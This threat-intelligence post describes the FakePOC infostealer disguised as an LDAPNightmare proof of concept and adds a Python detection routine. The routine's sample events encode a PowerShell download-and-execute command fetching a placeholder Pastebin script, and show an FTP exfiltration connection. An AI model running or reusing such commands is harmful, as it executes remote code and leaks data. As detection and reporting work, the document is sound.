
"FakePOC" Infostealer Masquerading as LDAPNightmare PoC Exploit

Written by The Hivemind | Jan 13, 2025 8:00:14 PM

Executive Summary

An infostealer, dubbed “FakePOC”, was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit.

Key Takeaways

  • An infostealer was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit. 
  • While no official name has been given to this malware family, Trend Micro detects the associated samples as TrojanSpy.Win32.FAKEPOC.THAOGBE and Trojan.PS1.FAKEPOC.THAOHBE. Based on this, PolySwarm analysts have chosen to nickname this infostealer FakePOC.
  • FakePOC steals data from the victim machine then compresses it into a ZIP file and uploads it to an external FTP server.

What is "FakePOC"?

An infostealer was recently observed masquerading as an LDAPNightmare proof of concept (PoC) exploit. While no official name has been given to this malware family, Trend Micro recently reported on this activity and detects the associated samples as TrojanSpy.Win32.FAKEPOC.THAOGBE and Trojan.PS1.FAKEPOC.THAOHBE. Based on this, PolySwarm analysts have chosen to nickname the infostealer FakePOC.

In late December, Microsoft addressed two critical vulnerabilities in Windows Lightweight Directory Access Protocol (LDAP), CVE-2024-49112 and CVE-2024-49113. CVE-2024-49112 is a remote code execution bug that can allow threat actors to use specially crafted LDAP requests to execute arbitrary code on the victim machine. CVE-2024-49113, also known as LDAPNightmare, is a denial of service vulnerability. Threat actors can exploit this vulnerability to crash the LDAP service and create service disruptions.

Threat actors likely took advantage of the fact that security researchers would seek out LDAPNightmare exploit PoCs and used a fake PoC as a lure to deliver a new information stealer family. While these threat actors are not the first to post malware masquerading as a PoC, this highlights the risks posed to security researchers, who may inadvertently download something that is not what it appears to be.

According to Trend Micro researchers, the repository containing the malware is a fork of the original creator's repository, with the original files replaced by an executable named poc.exe. When the file is executed, it drops and runs a PowerShell script that creates a scheduled job, which in turn executes an encoded script. That script downloads another script hosted on Pastebin.

The newly downloaded script collects the victim machine’s public IP and sends it to the C2. Other information collected by the malware includes computer information, process list, directory lists, network IPs, network adapters, and installed updates. This information is compressed into a ZIP file and uploaded to an external FTP server. 
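A hunting routine for the behaviour chain described above (PowerShell launched with an encoded command from a scheduled task, a script fetched from Pastebin, and an FTP upload from PowerShell), written here in Python as an added example and not code from PolySwarm or Trend Micro; it runs over constructed Sysmon-style records, and the host names, paths, Pastebin URL and FTP address are placeholders:

```python
import base64
import re
from collections import defaultdict

# Matches PowerShell's -EncodedCommand and its short aliases.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
TASK_HOSTS = {"svchost.exe", "taskeng.exe", "taskhostw.exe"}  # scheduled-task launchers

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or '' if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def hunt(events):
    """Map each host to the sorted list of FakePOC-chain stages seen in its telemetry."""
    hits = defaultdict(set)
    for ev in events:
        host, image = ev["host"], ev["image"].lower()
        if image != "powershell.exe":
            continue
        if ev["type"] == "process":
            script = decode_encoded_command(ev["cmd"])
            if script and ev["parent"].lower() in TASK_HOSTS:
                hits[host].add("encoded_powershell_from_scheduled_task")
            if "pastebin.com" in (ev["cmd"] + script).lower():
                hits[host].add("pastebin_script_download")
        elif ev["type"] == "network":
            if "pastebin.com" in ev["dest"].lower():
                hits[host].add("pastebin_script_download")
            if ev["port"] == 21:  # plain FTP from PowerShell is the exfil stage
                hits[host].add("ftp_exfil_from_powershell")
    return {h: sorted(s) for h, s in hits.items()}

def suspicious_hosts(events, min_stages=2):
    """Hosts on which at least min_stages of the chain were observed."""
    return sorted(h for h, s in hunt(events).items() if len(s) >= min_stages)

# Constructed sample records (placeholder hosts, paths, URL and IP), not real incident data.
ENC = base64.b64encode("IEX (iwr https://pastebin.com/raw/PLACEHOLDER).Content".encode("utf-16le")).decode()
EVENTS = [
    {"host": "ws01", "type": "process", "image": "poc.exe", "parent": "explorer.exe", "cmd": r"C:\Users\rt\Downloads\poc.exe"},
    {"host": "ws01", "type": "process", "image": "powershell.exe", "parent": "poc.exe", "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\rt\AppData\Local\Temp\x.ps1"},
    {"host": "ws01", "type": "process", "image": "powershell.exe", "parent": "svchost.exe", "cmd": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENC},
    {"host": "ws01", "type": "network", "image": "powershell.exe", "dest": "pastebin.com", "port": 443},
    {"host": "ws01", "type": "network", "image": "powershell.exe", "dest": "203.0.113.10", "port": 21},
    {"host": "ws02", "type": "process", "image": "powershell.exe", "parent": "svchost.exe", "cmd": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
```

Only ws01 is flagged: ws02 runs a scheduled PowerShell script too, but without an encoded command, a Pastebin fetch or an FTP connection.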

IOCs

PolySwarm has a sample associated with this activity.


6fa92aa4bb222560805392da26e21a4f6cc3ca0f2b89e75cf18a89d93f36505d


You can use the following CLI command to search for all "FakePOC" samples in our portal:

$ polyswarm link list -f FakePOC
